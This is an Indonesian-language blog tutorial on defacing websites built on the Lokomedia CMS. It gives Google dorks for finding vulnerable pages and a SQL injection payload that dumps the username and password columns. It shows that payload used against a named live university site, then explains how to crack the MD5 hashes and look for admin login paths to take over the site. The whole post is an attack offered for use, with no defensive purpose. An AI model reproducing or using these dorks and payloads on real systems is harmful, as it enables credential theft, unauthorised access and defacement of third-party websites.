Dikesempatan kali ini mimin mau ngasih tau tutorial deface poc SQL Lokomedia caranya cukup mudah loh, yu simak....
Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
intext:lokomedia inurl:statis- ext:html
(Kembangkan lagi agar dapat yang perawan)
Exploit : 'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+
- Kalian search di google dengan dork diatas
- Cari web yang bisa dientot :v
- Kalo sudah nemu tinggal klik
- Disini saya sudah punya live target ya
- Nah sekarang tinggal cara penempatan exploit
- Ini web target saya
http://iad.unmul.ac.id/statis-1-profil.html
- Setelah itu tinggal kita masukin Exploit nya seletah angka 1
- Caranya gimana?
- Seperti ini
http://iad.unmul.ac.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
- Kalo vuln nanti akan muncul user sama passwordnya di title
- Kalo mau lebih jelas kita tambahkan view-source: didepan link
- Seperti ini :
view-source:http://iad.unmul.ac.id/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
- Nanti tampilannya seperti ini
- User/passnya di bagian <title>
- Itukan passwordnya masih berbentuk hash MD5 kalian crack dulu cari di google banyak tempat cracknya
- Setelah tau password aslinya kalian tinggal cari admin loginnya
- Biasanya
/admin
/login.html
/admin/login.html
- Yang lain use your brain :v
Cukup sekian tutorial dari saya mohon maaf bila ada kesalahan mimin lagi ngantuk :v dan jangan lupa untuk share ke teman-teman kalian:)




0 Comments